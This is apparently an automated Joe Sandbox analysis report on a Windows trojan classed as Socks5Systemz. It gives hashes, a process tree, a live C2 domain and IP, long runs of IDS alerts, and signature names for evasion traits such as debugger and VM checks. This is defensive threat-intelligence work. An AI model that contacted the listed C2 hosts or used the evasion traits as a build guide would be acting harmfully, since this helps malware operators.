Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JtDj8LXROa.exe

Overview

General Information

Sample name:JtDj8LXROa.exe
renamed because original name is a hash value
Original sample name:d05072998fa8197eea94c4d66dfb89f6.exe
Analysis ID:1529362
MD5:d05072998fa8197eea94c4d66dfb89f6
SHA1:86df4d971ff887f27e0138e146fb89ad1a3e6db0
SHA256:5665d60c2745ec2f9f07446993d491d5a26360a873095ec5df711947ac854f68
Tags:32exetrojan
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
PE file has a writeable .text section
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • JtDj8LXROa.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\JtDj8LXROa.exe" MD5: D05072998FA8197EEA94C4D66DFB89F6)
    • is-3J7FL.tmp (PID: 7536 cmdline: "C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp" /SL4 $10482 "C:\Users\user\Desktop\JtDj8LXROa.exe" 3710467 52224 MD5: 5EC1C51DA61B4F15B2F40339D7D1DF7C)
      • txttosub32_64.exe (PID: 7584 cmdline: "C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe" -i MD5: B00E7D6666B62AB3475B654070B1BC1B)
  • cleanup
{"C2 list": ["dioimyp.info"]}
SourceRuleDescriptionAuthorStrings
00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    00000002.00000002.2986892779.0000000002CE3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
      Process Memory Space: txttosub32_64.exe PID: 7584JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-08T22:39:01.392614+020020494671A Network Trojan was detected192.168.2.449753185.208.158.24880TCP
        2024-10-08T22:39:04.845228+020020494671A Network Trojan was detected192.168.2.449753185.208.158.24880TCP
        2024-10-08T22:39:05.898869+020020494671A Network Trojan was detected192.168.2.449780185.208.158.24880TCP
        2024-10-08T22:39:06.296631+020020494671A Network Trojan was detected192.168.2.449780185.208.158.24880TCP
        2024-10-08T22:39:07.154488+020020494671A Network Trojan was detected192.168.2.449789185.208.158.24880TCP
        2024-10-08T22:39:08.038059+020020494671A Network Trojan was detected192.168.2.449795185.208.158.24880TCP
        2024-10-08T22:39:08.886528+020020494671A Network Trojan was detected192.168.2.449801185.208.158.24880TCP
        2024-10-08T22:39:09.275517+020020494671A Network Trojan was detected192.168.2.449801185.208.158.24880TCP
        2024-10-08T22:39:09.632316+020020494671A Network Trojan was detected192.168.2.449801185.208.158.24880TCP
        2024-10-08T22:39:10.469030+020020494671A Network Trojan was detected192.168.2.449812185.208.158.24880TCP
        2024-10-08T22:39:11.593035+020020494671A Network Trojan was detected192.168.2.449817185.208.158.24880TCP
        2024-10-08T22:39:12.418618+020020494671A Network Trojan was detected192.168.2.449825185.208.158.24880TCP
        2024-10-08T22:39:13.358319+020020494671A Network Trojan was detected192.168.2.449830185.208.158.24880TCP
        2024-10-08T22:39:14.294482+020020494671A Network Trojan was detected192.168.2.449837185.208.158.24880TCP
        2024-10-08T22:39:15.144505+020020494671A Network Trojan was detected192.168.2.449841185.208.158.24880TCP
        2024-10-08T22:39:16.031506+020020494671A Network Trojan was detected192.168.2.449848185.208.158.24880TCP
        2024-10-08T22:39:16.878553+020020494671A Network Trojan was detected192.168.2.449854185.208.158.24880TCP
        2024-10-08T22:39:17.772623+020020494671A Network Trojan was detected192.168.2.449861185.208.158.24880TCP
        2024-10-08T22:39:18.590338+020020494671A Network Trojan was detected192.168.2.449869185.208.158.24880TCP
        2024-10-08T22:39:19.684024+020020494671A Network Trojan was detected192.168.2.449875185.208.158.24880TCP
        2024-10-08T22:39:20.037271+020020494671A Network Trojan was detected192.168.2.449875185.208.158.24880TCP
        2024-10-08T22:39:20.864506+020020494671A Network Trojan was detected192.168.2.449884185.208.158.24880TCP
        2024-10-08T22:39:21.901292+020020494671A Network Trojan was detected192.168.2.449891185.208.158.24880TCP
        2024-10-08T22:39:22.278637+020020494671A Network Trojan was detected192.168.2.449891185.208.158.24880TCP
        2024-10-08T22:39:23.668745+020020494671A Network Trojan was detected192.168.2.449898185.208.158.24880TCP
        2024-10-08T22:39:24.514307+020020494671A Network Trojan was detected192.168.2.449904185.208.158.24880TCP
        2024-10-08T22:39:25.358260+020020494671A Network Trojan was detected192.168.2.449910185.208.158.24880TCP
        2024-10-08T22:39:26.198575+020020494671A Network Trojan was detected192.168.2.449916185.208.158.24880TCP
        2024-10-08T22:39:26.556915+020020494671A Network Trojan was detected192.168.2.449916185.208.158.24880TCP
        2024-10-08T22:39:26.917475+020020494671A Network Trojan was detected192.168.2.449916185.208.158.24880TCP
        2024-10-08T22:39:27.286587+020020494671A Network Trojan was detected192.168.2.449916185.208.158.24880TCP
        2024-10-08T22:39:28.104477+020020494671A Network Trojan was detected192.168.2.449925185.208.158.24880TCP
        2024-10-08T22:39:28.460290+020020494671A Network Trojan was detected192.168.2.449925185.208.158.24880TCP
        2024-10-08T22:39:29.328227+020020494671A Network Trojan was detected192.168.2.449934185.208.158.24880TCP
        2024-10-08T22:39:30.188237+020020494671A Network Trojan was detected192.168.2.449941185.208.158.24880TCP
        2024-10-08T22:39:31.032044+020020494671A Network Trojan was detected192.168.2.449947185.208.158.24880TCP
        2024-10-08T22:39:31.912424+020020494671A Network Trojan was detected192.168.2.449953185.208.158.24880TCP
        2024-10-08T22:39:32.771473+020020494671A Network Trojan was detected192.168.2.449959185.208.158.24880TCP
        2024-10-08T22:39:33.603640+020020494671A Network Trojan was detected192.168.2.449966185.208.158.24880TCP
        2024-10-08T22:39:34.189446+020020494671A Network Trojan was detected192.168.2.449966185.208.158.24880TCP
        2024-10-08T22:39:35.050666+020020494671A Network Trojan was detected192.168.2.449976185.208.158.24880TCP
        2024-10-08T22:39:35.915120+020020494671A Network Trojan was detected192.168.2.449982185.208.158.24880TCP
        2024-10-08T22:39:36.294245+020020494671A Network Trojan was detected192.168.2.449982185.208.158.24880TCP
        2024-10-08T22:39:36.692350+020020494671A Network Trojan was detected192.168.2.449982185.208.158.24880TCP
        2024-10-08T22:39:37.567701+020020494671A Network Trojan was detected192.168.2.449990185.208.158.24880TCP
        2024-10-08T22:39:38.404644+020020494671A Network Trojan was detected192.168.2.449995185.208.158.24880TCP
        2024-10-08T22:39:39.292277+020020494671A Network Trojan was detected192.168.2.450002185.208.158.24880TCP
        2024-10-08T22:39:39.652671+020020494671A Network Trojan was detected192.168.2.450002185.208.158.24880TCP
        2024-10-08T22:39:40.040729+020020494671A Network Trojan was detected192.168.2.450002185.208.158.24880TCP
        2024-10-08T22:39:40.407531+020020494671A Network Trojan was detected192.168.2.450002185.208.158.24880TCP
        2024-10-08T22:39:41.253814+020020494671A Network Trojan was detected192.168.2.450014185.208.158.24880TCP
        2024-10-08T22:39:42.069446+020020494671A Network Trojan was detected192.168.2.450021185.208.158.24880TCP
        2024-10-08T22:39:42.913938+020020494671A Network Trojan was detected192.168.2.450027185.208.158.24880TCP
        2024-10-08T22:39:44.385772+020020494671A Network Trojan was detected192.168.2.450032185.208.158.24880TCP
        2024-10-08T22:39:44.746210+020020494671A Network Trojan was detected192.168.2.450032185.208.158.24880TCP
        2024-10-08T22:39:45.108008+020020494671A Network Trojan was detected192.168.2.450032185.208.158.24880TCP
        2024-10-08T22:39:45.934481+020020494671A Network Trojan was detected192.168.2.450042185.208.158.24880TCP
        2024-10-08T22:39:46.302173+020020494671A Network Trojan was detected192.168.2.450042185.208.158.24880TCP
        2024-10-08T22:39:47.178736+020020494671A Network Trojan was detected192.168.2.450043185.208.158.24880TCP
        2024-10-08T22:39:47.988786+020020494671A Network Trojan was detected192.168.2.450044185.208.158.24880TCP
        2024-10-08T22:39:48.828913+020020494671A Network Trojan was detected192.168.2.450045185.208.158.24880TCP
        2024-10-08T22:39:49.661288+020020494671A Network Trojan was detected192.168.2.450046185.208.158.24880TCP
        2024-10-08T22:39:50.519433+020020494671A Network Trojan was detected192.168.2.450047185.208.158.24880TCP
        2024-10-08T22:39:51.482246+020020494671A Network Trojan was detected192.168.2.450048185.208.158.24880TCP
        2024-10-08T22:39:51.832826+020020494671A Network Trojan was detected192.168.2.450048185.208.158.24880TCP
        2024-10-08T22:39:52.694103+020020494671A Network Trojan was detected192.168.2.450049185.208.158.24880TCP
        2024-10-08T22:39:53.585525+020020494671A Network Trojan was detected192.168.2.450050185.208.158.24880TCP
        2024-10-08T22:39:54.625558+020020494671A Network Trojan was detected192.168.2.450051185.208.158.24880TCP
        2024-10-08T22:39:55.488669+020020494671A Network Trojan was detected192.168.2.450052185.208.158.24880TCP
        2024-10-08T22:39:56.322203+020020494671A Network Trojan was detected192.168.2.450053185.208.158.24880TCP
        2024-10-08T22:39:57.149354+020020494671A Network Trojan was detected192.168.2.450054185.208.158.24880TCP
        2024-10-08T22:39:57.996548+020020494671A Network Trojan was detected192.168.2.450055185.208.158.24880TCP
        2024-10-08T22:39:58.360931+020020494671A Network Trojan was detected192.168.2.450055185.208.158.24880TCP
        2024-10-08T22:39:59.200619+020020494671A Network Trojan was detected192.168.2.450056185.208.158.24880TCP
        2024-10-08T22:40:00.064421+020020494671A Network Trojan was detected192.168.2.450057185.208.158.24880TCP
        2024-10-08T22:40:00.899470+020020494671A Network Trojan was detected192.168.2.450058185.208.158.24880TCP
        2024-10-08T22:40:01.739536+020020494671A Network Trojan was detected192.168.2.450059185.208.158.24880TCP
        2024-10-08T22:40:02.568845+020020494671A Network Trojan was detected192.168.2.450060185.208.158.24880TCP
        2024-10-08T22:40:03.401975+020020494671A Network Trojan was detected192.168.2.450061185.208.158.24880TCP
        2024-10-08T22:40:04.218173+020020494671A Network Trojan was detected192.168.2.450062185.208.158.24880TCP
        2024-10-08T22:40:05.063485+020020494671A Network Trojan was detected192.168.2.450063185.208.158.24880TCP
        2024-10-08T22:40:05.937241+020020494671A Network Trojan was detected192.168.2.450064185.208.158.24880TCP
        2024-10-08T22:40:06.788945+020020494671A Network Trojan was detected192.168.2.450065185.208.158.24880TCP
        2024-10-08T22:40:07.621401+020020494671A Network Trojan was detected192.168.2.450066185.208.158.24880TCP
        2024-10-08T22:40:08.492900+020020494671A Network Trojan was detected192.168.2.450067185.208.158.24880TCP
        2024-10-08T22:40:09.353795+020020494671A Network Trojan was detected192.168.2.450068185.208.158.24880TCP
        2024-10-08T22:40:10.234591+020020494671A Network Trojan was detected192.168.2.450069185.208.158.24880TCP
        2024-10-08T22:40:11.752602+020020494671A Network Trojan was detected192.168.2.450070185.208.158.24880TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-08T22:39:01.392614+020020501121A Network Trojan was detected192.168.2.449753185.208.158.24880TCP
        2024-10-08T22:39:04.845228+020020501121A Network Trojan was detected192.168.2.449753185.208.158.24880TCP
        2024-10-08T22:39:05.898869+020020501121A Network Trojan was detected192.168.2.449780185.208.158.24880TCP
        2024-10-08T22:39:06.296631+020020501121A Network Trojan was detected192.168.2.449780185.208.158.24880TCP
        2024-10-08T22:39:07.154488+020020501121A Network Trojan was detected192.168.2.449789185.208.158.24880TCP
        2024-10-08T22:39:08.038059+020020501121A Network Trojan was detected192.168.2.449795185.208.158.24880TCP
        2024-10-08T22:39:08.886528+020020501121A Network Trojan was detected192.168.2.449801185.208.158.24880TCP
        2024-10-08T22:39:09.275517+020020501121A Network Trojan was detected192.168.2.449801185.208.158.24880TCP
        2024-10-08T22:39:09.632316+020020501121A Network Trojan was detected192.168.2.449801185.208.158.24880TCP
        2024-10-08T22:39:10.469030+020020501121A Network Trojan was detected192.168.2.449812185.208.158.24880TCP
        2024-10-08T22:39:11.593035+020020501121A Network Trojan was detected192.168.2.449817185.208.158.24880TCP
        2024-10-08T22:39:12.418618+020020501121A Network Trojan was detected192.168.2.449825185.208.158.24880TCP
        2024-10-08T22:39:13.358319+020020501121A Network Trojan was detected192.168.2.449830185.208.158.24880TCP
        2024-10-08T22:39:14.294482+020020501121A Network Trojan was detected192.168.2.449837185.208.158.24880TCP
        2024-10-08T22:39:15.144505+020020501121A Network Trojan was detected192.168.2.449841185.208.158.24880TCP
        2024-10-08T22:39:16.031506+020020501121A Network Trojan was detected192.168.2.449848185.208.158.24880TCP
        2024-10-08T22:39:16.878553+020020501121A Network Trojan was detected192.168.2.449854185.208.158.24880TCP
        2024-10-08T22:39:17.772623+020020501121A Network Trojan was detected192.168.2.449861185.208.158.24880TCP
        2024-10-08T22:39:18.590338+020020501121A Network Trojan was detected192.168.2.449869185.208.158.24880TCP
        2024-10-08T22:39:19.684024+020020501121A Network Trojan was detected192.168.2.449875185.208.158.24880TCP
        2024-10-08T22:39:20.037271+020020501121A Network Trojan was detected192.168.2.449875185.208.158.24880TCP
        2024-10-08T22:39:20.864506+020020501121A Network Trojan was detected192.168.2.449884185.208.158.24880TCP
        2024-10-08T22:39:21.901292+020020501121A Network Trojan was detected192.168.2.449891185.208.158.24880TCP
        2024-10-08T22:39:22.278637+020020501121A Network Trojan was detected192.168.2.449891185.208.158.24880TCP
        2024-10-08T22:39:23.668745+020020501121A Network Trojan was detected192.168.2.449898185.208.158.24880TCP
        2024-10-08T22:39:24.514307+020020501121A Network Trojan was detected192.168.2.449904185.208.158.24880TCP
        2024-10-08T22:39:25.358260+020020501121A Network Trojan was detected192.168.2.449910185.208.158.24880TCP
        2024-10-08T22:39:26.198575+020020501121A Network Trojan was detected192.168.2.449916185.208.158.24880TCP
        2024-10-08T22:39:26.556915+020020501121A Network Trojan was detected192.168.2.449916185.208.158.24880TCP
        2024-10-08T22:39:26.917475+020020501121A Network Trojan was detected192.168.2.449916185.208.158.24880TCP
        2024-10-08T22:39:27.286587+020020501121A Network Trojan was detected192.168.2.449916185.208.158.24880TCP
        2024-10-08T22:39:28.104477+020020501121A Network Trojan was detected192.168.2.449925185.208.158.24880TCP
        2024-10-08T22:39:28.460290+020020501121A Network Trojan was detected192.168.2.449925185.208.158.24880TCP
        2024-10-08T22:39:29.328227+020020501121A Network Trojan was detected192.168.2.449934185.208.158.24880TCP
        2024-10-08T22:39:30.188237+020020501121A Network Trojan was detected192.168.2.449941185.208.158.24880TCP
        2024-10-08T22:39:31.032044+020020501121A Network Trojan was detected192.168.2.449947185.208.158.24880TCP
        2024-10-08T22:39:31.912424+020020501121A Network Trojan was detected192.168.2.449953185.208.158.24880TCP
        2024-10-08T22:39:32.771473+020020501121A Network Trojan was detected192.168.2.449959185.208.158.24880TCP
        2024-10-08T22:39:33.603640+020020501121A Network Trojan was detected192.168.2.449966185.208.158.24880TCP
        2024-10-08T22:39:34.189446+020020501121A Network Trojan was detected192.168.2.449966185.208.158.24880TCP
        2024-10-08T22:39:35.050666+020020501121A Network Trojan was detected192.168.2.449976185.208.158.24880TCP
        2024-10-08T22:39:35.915120+020020501121A Network Trojan was detected192.168.2.449982185.208.158.24880TCP
        2024-10-08T22:39:36.294245+020020501121A Network Trojan was detected192.168.2.449982185.208.158.24880TCP
        2024-10-08T22:39:36.692350+020020501121A Network Trojan was detected192.168.2.449982185.208.158.24880TCP
        2024-10-08T22:39:37.567701+020020501121A Network Trojan was detected192.168.2.449990185.208.158.24880TCP
        2024-10-08T22:39:38.404644+020020501121A Network Trojan was detected192.168.2.449995185.208.158.24880TCP
        2024-10-08T22:39:39.292277+020020501121A Network Trojan was detected192.168.2.450002185.208.158.24880TCP
        2024-10-08T22:39:39.652671+020020501121A Network Trojan was detected192.168.2.450002185.208.158.24880TCP
        2024-10-08T22:39:40.040729+020020501121A Network Trojan was detected192.168.2.450002185.208.158.24880TCP
        2024-10-08T22:39:40.407531+020020501121A Network Trojan was detected192.168.2.450002185.208.158.24880TCP
        2024-10-08T22:39:41.253814+020020501121A Network Trojan was detected192.168.2.450014185.208.158.24880TCP
        2024-10-08T22:39:42.069446+020020501121A Network Trojan was detected192.168.2.450021185.208.158.24880TCP
        2024-10-08T22:39:42.913938+020020501121A Network Trojan was detected192.168.2.450027185.208.158.24880TCP
        2024-10-08T22:39:44.385772+020020501121A Network Trojan was detected192.168.2.450032185.208.158.24880TCP
        2024-10-08T22:39:44.746210+020020501121A Network Trojan was detected192.168.2.450032185.208.158.24880TCP
        2024-10-08T22:39:45.108008+020020501121A Network Trojan was detected192.168.2.450032185.208.158.24880TCP
        2024-10-08T22:39:45.934481+020020501121A Network Trojan was detected192.168.2.450042185.208.158.24880TCP
        2024-10-08T22:39:46.302173+020020501121A Network Trojan was detected192.168.2.450042185.208.158.24880TCP
        2024-10-08T22:39:47.178736+020020501121A Network Trojan was detected192.168.2.450043185.208.158.24880TCP
        2024-10-08T22:39:47.988786+020020501121A Network Trojan was detected192.168.2.450044185.208.158.24880TCP
        2024-10-08T22:39:48.828913+020020501121A Network Trojan was detected192.168.2.450045185.208.158.24880TCP
        2024-10-08T22:39:49.661288+020020501121A Network Trojan was detected192.168.2.450046185.208.158.24880TCP
        2024-10-08T22:39:50.519433+020020501121A Network Trojan was detected192.168.2.450047185.208.158.24880TCP
        2024-10-08T22:39:51.482246+020020501121A Network Trojan was detected192.168.2.450048185.208.158.24880TCP
        2024-10-08T22:39:51.832826+020020501121A Network Trojan was detected192.168.2.450048185.208.158.24880TCP
        2024-10-08T22:39:52.694103+020020501121A Network Trojan was detected192.168.2.450049185.208.158.24880TCP
        2024-10-08T22:39:53.585525+020020501121A Network Trojan was detected192.168.2.450050185.208.158.24880TCP
        2024-10-08T22:39:54.625558+020020501121A Network Trojan was detected192.168.2.450051185.208.158.24880TCP
        2024-10-08T22:39:55.488669+020020501121A Network Trojan was detected192.168.2.450052185.208.158.24880TCP
        2024-10-08T22:39:56.322203+020020501121A Network Trojan was detected192.168.2.450053185.208.158.24880TCP
        2024-10-08T22:39:57.149354+020020501121A Network Trojan was detected192.168.2.450054185.208.158.24880TCP
        2024-10-08T22:39:57.996548+020020501121A Network Trojan was detected192.168.2.450055185.208.158.24880TCP
        2024-10-08T22:39:58.360931+020020501121A Network Trojan was detected192.168.2.450055185.208.158.24880TCP
        2024-10-08T22:39:59.200619+020020501121A Network Trojan was detected192.168.2.450056185.208.158.24880TCP
        2024-10-08T22:40:00.064421+020020501121A Network Trojan was detected192.168.2.450057185.208.158.24880TCP
        2024-10-08T22:40:00.899470+020020501121A Network Trojan was detected192.168.2.450058185.208.158.24880TCP
        2024-10-08T22:40:01.739536+020020501121A Network Trojan was detected192.168.2.450059185.208.158.24880TCP
        2024-10-08T22:40:02.568845+020020501121A Network Trojan was detected192.168.2.450060185.208.158.24880TCP
        2024-10-08T22:40:03.401975+020020501121A Network Trojan was detected192.168.2.450061185.208.158.24880TCP
        2024-10-08T22:40:04.218173+020020501121A Network Trojan was detected192.168.2.450062185.208.158.24880TCP
        2024-10-08T22:40:05.063485+020020501121A Network Trojan was detected192.168.2.450063185.208.158.24880TCP
        2024-10-08T22:40:05.937241+020020501121A Network Trojan was detected192.168.2.450064185.208.158.24880TCP
        2024-10-08T22:40:06.788945+020020501121A Network Trojan was detected192.168.2.450065185.208.158.24880TCP
        2024-10-08T22:40:07.621401+020020501121A Network Trojan was detected192.168.2.450066185.208.158.24880TCP
        2024-10-08T22:40:08.492900+020020501121A Network Trojan was detected192.168.2.450067185.208.158.24880TCP
        2024-10-08T22:40:09.353795+020020501121A Network Trojan was detected192.168.2.450068185.208.158.24880TCP
        2024-10-08T22:40:10.234591+020020501121A Network Trojan was detected192.168.2.450069185.208.158.24880TCP
        2024-10-08T22:40:11.752602+020020501121A Network Trojan was detected192.168.2.450070185.208.158.24880TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: txttosub32_64.exe.7584.2.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["dioimyp.info"]}
        Source: JtDj8LXROa.exeReversingLabs: Detection: 15%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\ProgramData\Eurofighter Typhoon Game 10.8.45\Eurofighter Typhoon Game 10.8.45.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00459A70 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_00459A70
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00459B24 ArcFourCrypt,1_2_00459B24
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00459B3C ArcFourCrypt,1_2_00459B3C
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

        Compliance

        barindex
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeUnpacked PE file: 2.2.txttosub32_64.exe.400000.0.unpack
        Source: JtDj8LXROa.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0046CA58 FindFirstFileA,FindNextFileA,FindClose,1_2_0046CA58
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00450A2C FindFirstFileA,GetLastError,1_2_00450A2C
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00474EB4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_00474EB4
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0045E01C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_0045E01C
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0045CB7C FindFirstFileA,FindNextFileA,FindClose,1_2_0045CB7C
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00473164 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_00473164
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0048B510 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_0048B510
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0045DC88 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_0045DC88
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49753 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49753 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49780 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49780 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49789 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49789 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49795 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49795 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49801 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49801 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49830 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49830 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49837 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49817 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49817 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49841 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49841 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49812 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49837 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49812 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49861 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49861 -> 185.208.158.248:80
